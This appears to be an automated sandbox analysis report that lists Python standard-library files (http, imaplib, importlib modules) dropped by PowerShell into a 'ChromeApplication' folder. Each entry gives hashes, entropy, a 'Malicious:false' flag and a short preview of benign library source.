                                                                                                                                                                                                  SSDEEP:192:FcbQSiy+TbKatPR4qXiasXh+O5ZSsB3CeAXI5UKj:F/yqXiasXzgep5UKj
                                                                                                                                                                                                  MD5:26B5CF5F93FA25440187796DB6CCCE16
                                                                                                                                                                                                  SHA1:7547272BDFA0BC9A9387CDE17FC5972B548E2593
                                                                                                                                                                                                  SHA-256:6297DA88AB77CCED08A3C622C51292851CC95B8175B7342B4CD7F86595F73158
                                                                                                                                                                                                  SHA-512:BD5737BFCE668B6F1513A00010C8A33E6D2841C709B4DFE86DA1A7EE51C78C27AB61DABA6E1F2599432EA4224D6E488F61F464AF385F5180A7F55EC9142D4F1A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from enum import IntEnum....__all__ = ['HTTPStatus']......class HTTPStatus(IntEnum):.. """HTTP status codes and reason phrases.... Status codes from the following RFCs are all observed:.... * RFC 7231: Hypertext Transfer Protocol (HTTP/1.1), obsoletes 2616.. * RFC 6585: Additional HTTP Status Codes.. * RFC 3229: Delta encoding in HTTP.. * RFC 4918: HTTP Extensions for WebDAV, obsoletes 2518.. * RFC 5842: Binding Extensions to WebDAV.. * RFC 7238: Permanent Redirect.. * RFC 2295: Transparent Content Negotiation in HTTP.. * RFC 2774: An HTTP Extension Framework.. * RFC 7725: An HTTP Status Code to Report Legal Obstacles.. * RFC 7540: Hypertext Transfer Protocol Version 2 (HTTP/2).. * RFC 2324: Hyper Text Coffee Pot Control Protocol (HTCPCP/1.0).. * RFC 8297: An HTTP Status Code for Indicating Hints.. * RFC 8470: Using Early Data in HTTP.. """.. def __new__(cls, value, phrase, descriptio

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\http\client.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):58321
                                                                                                                                                                                                  Entropy (8bit):4.406436591744728
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:l3z+32B5SQi1oScyNzBooOSlNcVkACLogKRkRAW5U:l3z+32B5SQi1oScyNzBooOSl4CLoRkRM
                                                                                                                                                                                                  MD5:5D6BFC608ECF70840D6DE2795FD69F1F
                                                                                                                                                                                                  SHA1:17F160F07B156F498D251E189408CBFC5730EA86
                                                                                                                                                                                                  SHA-256:1E627D49863719FE81EEC9EC3CE3A11263E24848F7F9A0DC01DF515971E6ACF5
                                                                                                                                                                                                  SHA-512:AB562C2CB8243109F74C44AD157EA470181581114D42907F76B89B65B7CAAD745B6C0EF39F91AAA02146F1E67C68A244FFFDC0B00E83405A34060E4F84DD0655
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:r"""HTTP/1.1 client library....<intro stuff goes here>..<other stuff, too>....HTTPConnection goes through a number of "states", which define when a client..may legally make another request or fetch the response for a particular..request. This diagram details these state transitions:.... (null).. |.. | HTTPConnection().. v.. Idle.. |.. | putrequest().. v.. Request-started.. |.. | ( putheader() )* endheaders().. v.. Request-sent.. |\_____________________________.. | | getresponse() raises.. | response = getresponse() | ConnectionError.. v v.. Unread-response Idle.. [Response-headers-read].. |\____________________.. | |.. | response.read() | putrequest().. v v.. Idle Req-started-unread-response.. ______/|.. /

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\http\cookiejar.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):79540
                                                                                                                                                                                                  Entropy (8bit):4.458584258215225
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:Gsf5OCLTKr88g99gZ5m2SLbzf7bbV2VwRyx67wF:G037jgZ5YD/I6Rs6UF
                                                                                                                                                                                                  MD5:C1F3927D2E339DE399959A069F045EC6
                                                                                                                                                                                                  SHA1:B70C655321DBD6F9D95342962FFE39BDA26CCBAF
                                                                                                                                                                                                  SHA-256:55A941BAB49900DC61701C80397554F2F79BF235A26D75DCFF96D20278097D87
                                                                                                                                                                                                  SHA-512:548E40EB51392C99C16A241A12CDBBDD0C4697BC1A4CEF3F6E7AF7BCB966AD41D6EE88E899A9C86735246CDEC569A4155362E4D614E0925921097928EE9A3978
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:r"""HTTP cookie handling for web clients.....This module has (now fairly distant) origins in Gisle Aas' Perl module..HTTP::Cookies, from the libwww-perl library.....Docstrings, comments and debug strings in this code refer to the..attributes of the HTTP cookie system as cookie-attributes, to distinguish..them clearly from Python attributes.....Class diagram (note that BSDDBCookieJar and the MSIE* classes are not..distributed with the Python standard library, but are available from..http://wwwsearch.sf.net/):.... CookieJar____.. / \ \.. FileCookieJar \ \.. / | \ \ \.. MozillaCookieJar | LWPCookieJar \ \.. | | \.. | ---MSIEBase | \.. | / | | \.. | / MSIEDBCookieJar BSDDBCookieJar.. |/.. MSIECookieJar...."""....__all__ = ['Cookie', 'Cook

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\http\cookies.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):21094
                                                                                                                                                                                                  Entropy (8bit):4.737928355464598
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:ShNUZtUx0dqJ1sJxttmT+tOVVyeuPFcLIcfOuu7jvxyXWNYN:ShNUZmx0dCsNPFGIcfyM+YN
                                                                                                                                                                                                  MD5:BB19E50B174A51A5972C7DFD8F142ADB
                                                                                                                                                                                                  SHA1:FE6E9FB17F72042FF2EF00FC6E7F5C51631D2F3C
                                                                                                                                                                                                  SHA-256:D049D9DE921DD9A2D13CD205FC0ABED14691CDDC8BA6F3C174653AF938ECD79F
                                                                                                                                                                                                  SHA-512:993B3238D231137B5E703FC4ADC0FD2A263A6EB7D07FDBFCA11DEEC422184A99C8ABAD6F2CE8F6A36C253D5967BAE8BA921261C636BE4F4B4A3B7D22A05EB27A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:####..# Copyright 2000 by Timothy O'Malley <timo@alum.mit.edu>..#..# All Rights Reserved..#..# Permission to use, copy, modify, and distribute this software..# and its documentation for any purpose and without fee is hereby..# granted, provided that the above copyright notice appear in all..# copies and that both that copyright notice and this permission..# notice appear in supporting documentation, and that the name of..# Timothy O'Malley not be used in advertising or publicity..# pertaining to distribution of the software without specific, written..# prior permission...#..# Timothy O'Malley DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS..# SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY..# AND FITNESS, IN NO EVENT SHALL Timothy O'Malley BE LIABLE FOR..# ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES..# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,..# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS..# ACTION, ARISING

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\http\server.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):49514
                                                                                                                                                                                                  Entropy (8bit):4.578488993320622
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:lfngUjS+gSOsV6f0aKucGIEgA0Bw4ETVp5tU6N0YO:lvgUjS+7OsVQ0aKucGIEOBuTZN0YO
                                                                                                                                                                                                  MD5:A0E7352D69843F9F999D3EC06678E1B4
                                                                                                                                                                                                  SHA1:7FF7AFC9FB2D5B14A6FDC80882642092F472EE90
                                                                                                                                                                                                  SHA-256:C97B4D93BF1BB9DD82916677A95EF73AA8E73374E3EB9244F2E8560410965AE4
                                                                                                                                                                                                  SHA-512:41729951BAE2E77B3EA235B54A9A1F21792F6D202E4A658D894CE8E6AB063B3AD4D9824D0EE1CC94A0F826808E197E1E2E1BE48308AB504E8EEB97B9AB474E9D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""HTTP server classes.....Note: BaseHTTPRequestHandler doesn't implement any HTTP request; see..SimpleHTTPRequestHandler for simple implementations of GET, HEAD and POST,..and CGIHTTPRequestHandler for CGI scripts.....It does, however, optionally implement HTTP/1.1 persistent connections,..as of version 0.3.....Notes on CGIHTTPRequestHandler..------------------------------....This class implements GET and POST requests to cgi-bin scripts.....If the os.fork() function is not present (e.g. on Windows),..subprocess.Popen() is used as a fallback, with slightly altered semantics.....In all cases, the implementation is intentionally naive -- all..requests are executed synchronously.....SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL..-- it may execute arbitrary Python code or external programs.....Note that status code 200 is sent prior to execution of a CGI script, so..scripts cannot send other status codes such as 302 (redirect).....XXX To do:....- log requests even

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\imaplib.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):56515
                                                                                                                                                                                                  Entropy (8bit):4.687424781884806
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:LxnlDvnsQeIBol2eKsBKOgE1IFWv4wem8YCY17JTBY:L9lbsQ5el2eKs4OgE1IFwDem8YN5Ri
                                                                                                                                                                                                  MD5:F26881E2906384DBE388BAFCC0A32393
                                                                                                                                                                                                  SHA1:9246F7D6A4DAD4FF9EA4BE73209A63A2B17CC2D3
                                                                                                                                                                                                  SHA-256:76B464DD9B86B5546E228A310B57C848F8B58533FDFBD19A95F55381192CA508
                                                                                                                                                                                                  SHA-512:2D45809961FDA91A0D7A9F2294FC0F865A05589FF2910C54B7A714175FB09DCAA5B760641F48520B11FDF3DEBDF992CE56873537B61EC826F4623FAF4A33D08B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""IMAP4 client.....Based on RFC 2060.....Public class: IMAP4..Public variable: Debug..Public functions: Internaldate2tuple.. Int2AP.. ParseFlags.. Time2Internaldate.."""....# Author: Piers Lauder <piers@cs.su.oz.au> December 1997...#..# Authentication code contributed by Donn Cave <donn@u.washington.edu> June 1998...# String method conversion by ESR, February 2001...# GET/SETACL contributed by Anthony Baxter <anthony@interlink.com.au> April 2001...# IMAP4_SSL contributed by Tino Lange <Tino.Lange@isg.de> March 2002...# GET/SETQUOTA contributed by Andreas Zeidler <az@kreativkombinat.de> June 2002...# PROXYAUTH contributed by Rick Holbert <holbert.13@osu.edu> November 2002...# GET/SETANNOTATION contributed by Tomas Lindroos <skitta@abo.fi> June 2005.....__version__ = "2.58"....import binascii, errno, random, re, socket, subprocess, sys, time, calendar..from datetime import datetime, timezone, tim

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\imghdr.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3976
                                                                                                                                                                                                  Entropy (8bit):4.730395972681575
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:MwbIH3M4Hmme6v5At+TXksO2E2+kqaQG6q8GjHjKkz:MRDcaKs/QCpjHjKkz
                                                                                                                                                                                                  MD5:DFFC1936F5CECC4DD8901EA2B924BA1D
                                                                                                                                                                                                  SHA1:7A09F45AE6DE63DABFD951C904ACBD1BB6316D76
                                                                                                                                                                                                  SHA-256:E01288F17006090085CE2CEFB5C8CE94BF0E7D441EEC70BA57BD70034C886899
                                                                                                                                                                                                  SHA-512:2F826D923DD26CB58EAD8F2CB7D56B7C3317D59EF0CDA51C8BA0B126DE39946286F75978249150F3828C088C5A01F605895081262A90A6DD51B763B2C34AFBE2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Recognize image file formats based on their first few bytes."""....from os import PathLike....__all__ = ["what"]....#-------------------------#..# Recognize image headers #..#-------------------------#....def what(file, h=None):.. f = None.. try:.. if h is None:.. if isinstance(file, (str, PathLike)):.. f = open(file, 'rb').. h = f.read(32).. else:.. location = file.tell().. h = file.read(32).. file.seek(location).. for tf in tests:.. res = tf(h, f).. if res:.. return res.. finally:.. if f: f.close().. return None......#---------------------------------#..# Subroutines per image file type #..#---------------------------------#....tests = []....def test_jpeg(h, f):.. """JPEG data in JFIF or Exif format""".. if h[6:10] in (b'JFIF', b'Exif'):.. return 'jpeg'....tests.append(test_jpeg)....def test_png(h, f):..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\imp.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10937
                                                                                                                                                                                                  Entropy (8bit):4.78644206171614
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:w7D45FhQzMd3kVK+bhhVA02690t/93v5lGbqRDnZfOmSdF2p:wg+WkVK+lhVAuU9xlGuR1nW2p
                                                                                                                                                                                                  MD5:B961B5EA8D2A81594CB59270C55A9412
                                                                                                                                                                                                  SHA1:68C059B59A0FB1E697F56DE9894842E07EF549DB
                                                                                                                                                                                                  SHA-256:22455CCD2ECA0C0F032603FCEF28684DF795450E402C1E98AC8039AC9E6CA5E6
                                                                                                                                                                                                  SHA-512:6B04010B64BA3232CE1401DEA03FA97E12E374D168EA9F1E441B60D532F45B53D56814AC73EB78B0AE32C0F2CAAF0E2CDA802A8FF10E28D7EAA73CFAA6220874
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""This module provides the components needed to build your own __import__..function. Undocumented functions are obsolete.....In most cases it is preferred you consider using the importlib module's..functionality over this module....."""..# (Probably) need to stay in _imp..from _imp import (lock_held, acquire_lock, release_lock,.. get_frozen_object, is_frozen_package,.. init_frozen, is_builtin, is_frozen,.. _fix_co_filename)..try:.. from _imp import create_dynamic..except ImportError:.. # Platform doesn't support dynamic loading... create_dynamic = None....from importlib._bootstrap import _ERR_MSG, _exec, _load, _builtin_from_name..from importlib._bootstrap_external import SourcelessFileLoader....from importlib import machinery..from importlib import util..import importlib..import os..import sys..import tokenize..import types..import warnings....warnings.warn("the imp module is deprecated in favour of importlib and slated "..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\importlib\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6265
                                                                                                                                                                                                  Entropy (8bit):4.606670655660399
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:4tH2fRvVSnhV4kSSNOyKGk+SNplpIZvYZwPbBbrx5To141x41YLat9RH++3mTWtj:glz4vSNGGXSNV4bRrqs41Jt9RJmCt/hV
                                                                                                                                                                                                  MD5:DBE317F92FE33213AA2410A2479B9C54
                                                                                                                                                                                                  SHA1:29DDC88364C936E2D4FF3EA9B14F2176AC6A4230
                                                                                                                                                                                                  SHA-256:6D4AB4726790393388B483A56966276861EB3353731646572774FFA90B68289E
                                                                                                                                                                                                  SHA-512:07D0E99B5CFA1608E74279B5FF5E03D49B714C5B78F2B4FB3839CBE9A3133FE076650BF2C490736F7D88BB3584701F5931D9BB457C3A618AEA5C8DDEA3112431
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""A pure Python implementation of import."""..__all__ = ['__import__', 'import_module', 'invalidate_caches', 'reload']....# Bootstrap help #####################################################....# Until bootstrapping is complete, DO NOT import any modules that attempt..# to import importlib._bootstrap (directly or indirectly). Since this..# partially initialised package would be present in sys.modules, those..# modules would get an uninitialised copy of the source version, instead..# of a fully initialised version (either the frozen one or the one..# initialised below if the frozen one is not available)...import _imp # Just the builtin component, NOT the full Python module..import sys....try:.. import _frozen_importlib as _bootstrap..except ImportError:.. from . import _bootstrap.. _bootstrap._setup(sys, _imp)..else:.. # importlib._bootstrap is the built-in import, ensure we don't create.. # a second copy of the module... _bootstrap.__name__ = 'importlib._bootstrap

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\importlib\_abc.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1906
                                                                                                                                                                                                  Entropy (8bit):4.433036910849268
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:7+Sd1gyYp8ImdaCtl27fisRiqITfqF6BSES5C+LOqqc8vbBLlZvI/iWnWuPQ:CS0207fisQqgqF2SEqxStLlhIqWW
                                                                                                                                                                                                  MD5:CBCCC8E431A338F393CCD4D3F244CCC5
                                                                                                                                                                                                  SHA1:77FF0ADCB6F35D675030BEC62BB55AA076692037
                                                                                                                                                                                                  SHA-256:C4376232DA9464A27B02A530473489486D570F25A063715F3AD5A24D92FFE527
                                                                                                                                                                                                  SHA-512:27F28525A50F068F9327613AE5A71FAE25984292ED9CDEDF92B93E9DE4E00E8121BD397E34C7E728E5849289285677ED88C43F6AB6EFB60DA36331E9C2E6CC0C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Subset of importlib.abc used to reduce importlib.util imports."""..from . import _bootstrap..import abc..import warnings......class Loader(metaclass=abc.ABCMeta):.... """Abstract base class for import loaders.""".... def create_module(self, spec):.. """Return a module to initialize and into which to load..... This method should raise ImportError if anything prevents it.. from creating a new module. It may return None to indicate.. that the spec should create the new module... """.. # By default, defer to default semantics for the new module... return None.... # We don't define exec_module() here since that would break.. # hasattr checks we do to support backward compatibility..... def load_module(self, fullname):.. """Return the loaded module..... The module must be added to sys.modules and have import-related.. attributes set properly. The fullname is a str..... ImportError is raised on fa

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\importlib\_adapters.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1991
                                                                                                                                                                                                  Entropy (8bit):4.390505646801514
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:0i644hrdO2kdSNH1UKetWEeF6kKznFEjRWOem++bPnn3kVqf:B644hrU2kwDL16kGCVWOHNznMqf
                                                                                                                                                                                                  MD5:5C775988B17A8E77726D985B2FE1284C
                                                                                                                                                                                                  SHA1:DC9FA37CDF9F1EC1045B16BEE536C1D54C488539
                                                                                                                                                                                                  SHA-256:F338A91DEEF0B819B408D7BAEA338D637B817A69B3270A6608ACF79EF9ED700A
                                                                                                                                                                                                  SHA-512:A88F3248FA18787B4D98F50EADC5DED6AC4D7B09A8B618C1CE8D440A3FC2B28B8DE00AAAE8338840549C77F92E01F6D12F02C4940FD350BC96EE2AE041E12DCA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:from contextlib import suppress....from . import abc......class SpecLoaderAdapter:.. """.. Adapt a package spec to adapt the underlying loader... """.... def __init__(self, spec, adapter=lambda spec: spec.loader):.. self.spec = spec.. self.loader = adapter(spec).... def __getattr__(self, name):.. return getattr(self.spec, name)......class TraversableResourcesLoader:.. """.. Adapt a loader to provide TraversableResources... """.... def __init__(self, spec):.. self.spec = spec.... def get_resource_reader(self, name):.. return DegenerateFiles(self.spec)._native()......class DegenerateFiles:.. """.. Adapter for an existing or non-existant resource reader.. to provide a degenerate .files()... """.... class Path(abc.Traversable):.. def iterdir(self):.. return iter(()).... def is_dir(self):.. return False.... is_file = exists = is_dir # type: ignore.... def joinpa

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\importlib\_bootstrap.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):42676
                                                                                                                                                                                                  Entropy (8bit):4.491854158137825
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:1eKvy2ADZIwUMAfvkUFlXppkl89q/5R5B/miJ5j2:DDCUdfvkUC72
                                                                                                                                                                                                  MD5:03A827AAC6D6D4EBEA01D384EAA30F32
                                                                                                                                                                                                  SHA1:81ADE09B0AEADF4B2721F56BE11E75E453192B45
                                                                                                                                                                                                  SHA-256:B300CE18C15FD539F099883AEDC24B1A91E5C35B581EFDBB9E21D638A4EC82E5
                                                                                                                                                                                                  SHA-512:B0B3BA998638A3CF0C8A8DF4D9B678FBF4D92AC387064151A6D7DF3179103CC5B4C417146CEF6D3E1120658672807AA89BC92867DF7A7C7022DD26A6FF361A80
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Core implementation of import.....This module is NOT meant to be directly imported! It has been designed such..that it can be bootstrapped into Python as the implementation of import. As..such it requires the injection of specific modules and attributes in order to..work. One should use importlib as the public-facing version of this module....."""..#..# IMPORTANT: Whenever making changes to this module, be sure to run a top-level..# `make regen-importlib` followed by `make` in order to get the frozen version..# of the module updated. Not doing so will result in the Makefile to fail for..# all others who don't have a ./python around to freeze the module..# in the early stages of compilation...#....# See importlib._setup() for what is injected into the global namespace.....# When editing this code be aware that code executed at import time CANNOT..# reference any injected objects! This includes not only global code but also..# anything specified at the class level.....def _object_name

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\importlib\_bootstrap_external.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):66536
                                                                                                                                                                                                  Entropy (8bit):4.677552891760068
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:iKsoAmFqJ4QFhE/tn5k0feP1tO4o4MCxl6knccZ/76RlgSHvflx3ov:txc4QF8tn5yM4B6kccZzILP+
                                                                                                                                                                                                  MD5:B6ED9264CB6BA04A6F439723C05F3072
                                                                                                                                                                                                  SHA1:0B8B9604896114FE1F5FB76087BAADCFED21D334
                                                                                                                                                                                                  SHA-256:CD9B77650B59135A764C6A536151673D4130BD88C9171223376D19CE5B971B77
                                                                                                                                                                                                  SHA-512:384439A20C07A730CFB4E8DAB9793D726157DF2760A3D4A6C95C3F9E02DEC52EF1FCB500D1CC9E5386D705FAB4091F4EBA2848BD2055F51D7F7F44C7DB66C084
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Core implementation of path-based import.....This module is NOT meant to be directly imported! It has been designed such..that it can be bootstrapped into Python as the implementation of import. As..such it requires the injection of specific modules and attributes in order to..work. One should use importlib as the public-facing version of this module....."""..# IMPORTANT: Whenever making changes to this module, be sure to run a top-level..# `make regen-importlib` followed by `make` in order to get the frozen version..# of the module updated. Not doing so will result in the Makefile to fail for..# all others who don't have a ./python around to freeze the module in the early..# stages of compilation...#....# See importlib._setup() for what is injected into the global namespace.....# When editing this code be aware that code executed at import time CANNOT..# reference any injected objects! This includes not only global code but also..# anything specified at the class level.....# Module

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\importlib\_common.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3340
                                                                                                                                                                                                  Entropy (8bit):4.6745746844172285
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:C15GjAcQmz/EgZIyHf4Dd2juC6cO2HEzIX9SkqR8E:CowI/VLf452t6aHEzIX9S1R8E
                                                                                                                                                                                                  MD5:97023E935E8C794384CC5651D2A64F28
                                                                                                                                                                                                  SHA1:67B8407421BC914FDEC799FF161D4131454ED372
                                                                                                                                                                                                  SHA-256:F2ED6530F455FA56E1BCF69BB85553D72B2013933624533AFA69A874EB67AE00
                                                                                                                                                                                                  SHA-512:A0B82EF0EAA82D2F91763648086EE4046D7149BC2E3FA3A34A52A381CE8CD9BEBA5DBADBE71A9BFA012B239B849F403B092D3B0A90F542C6D0CEBD3D603804C4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import os..import pathlib..import tempfile..import functools..import contextlib..import types..import importlib....from typing import Union, Any, Optional..from .abc import ResourceReader, Traversable....from ._adapters import wrap_spec....Package = Union[types.ModuleType, str]......def files(package):.. # type: (Package) -> Traversable.. """.. Get a Traversable resource from a package.. """.. return from_package(get_package(package))......def normalize_path(path):.. # type: (Any) -> str.. """Normalize a path by ensuring it is a string..... If the resulting string contains path separators, an exception is raised... """.. str_path = str(path).. parent, file_name = os.path.split(str_path).. if parent:.. raise ValueError(f'{path!r} must be only a file name').. return file_name......def get_resource_reader(package):.. # type: (types.ModuleType) -> Optional[ResourceReader].. """.. Return the package's loader if it's a ResourceReader...

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\importlib\abc.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):14863
                                                                                                                                                                                                  Entropy (8bit):4.500827376021012
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:JL/+/DsHY+mmxtRIE8O1gIjyyroF8M1470fY7GTDHv+RI+oe+:RGMY+mg9dyqMw7Esu
                                                                                                                                                                                                  MD5:1C219A984C22F7CEFDF4658FF6F7717A
                                                                                                                                                                                                  SHA1:C4C4B39D02F10989A0256612C59E8E35B808D99C
                                                                                                                                                                                                  SHA-256:03060C6B437D5268556E45EC50A89B25FF2DBBB393695611046BE776233BD568
                                                                                                                                                                                                  SHA-512:EEEA7E1582181A408A34F2BA2B6AA8ABCFDFC37C86ABF109CBD6233FEF68FB65724659857F426D41DA50D48B36E81D736BF5E16CC8FFFEF55F7EF628634BB4BD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Abstract base classes related to import."""..from . import _bootstrap_external..from . import machinery..try:.. import _frozen_importlib..except ImportError as exc:.. if exc.name != '_frozen_importlib':.. raise.. _frozen_importlib = None..try:.. import _frozen_importlib_external..except ImportError:.. _frozen_importlib_external = _bootstrap_external..from ._abc import Loader..import abc..import warnings..from typing import BinaryIO, Iterable, Text..from typing import Protocol, runtime_checkable......def _register(abstract_cls, *classes):.. for cls in classes:.. abstract_cls.register(cls).. if _frozen_importlib is not None:.. try:.. frozen_cls = getattr(_frozen_importlib, cls.__name__).. except AttributeError:.. frozen_cls = getattr(_frozen_importlib_external, cls.__name__).. abstract_cls.register(frozen_cls)......class Finder(metaclass=abc.ABCMeta):.... """Legacy abstract base cl

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\importlib\machinery.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):850
                                                                                                                                                                                                  Entropy (8bit):4.966782780310052
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:YT166asGSaopamPQpaJ2XEaJ2QaJLYaJRaJnaJiaJen5Jir:2VGSD0y20y2QyLYyRynyiy25Jir
                                                                                                                                                                                                  MD5:AC4151821693C881CEF5C5567EE36977
                                                                                                                                                                                                  SHA1:98C415AF4EECD5832ACD4DCA3FE2DBC220CE4B02
                                                                                                                                                                                                  SHA-256:1B8C62B3A0494C064B37D1812F3A67A475B874A383C937665C6DD66FCDC8F7B1
